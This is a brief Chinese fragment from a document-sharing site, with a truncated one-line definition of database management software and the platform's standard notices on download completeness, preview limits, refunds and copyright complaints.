用于存储、检索、定义和管理大量数据的软件，提供数据组织和访问的方

1、下载文档前请自行甄别文档内容的完整性，平台不提供额外的编辑、内容补充、找答案等附加服务。
2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
3、如文档侵犯您的权益，请联系客服反馈,我们会尽快为您处理(人工客服工作时间：9:00-18:30)。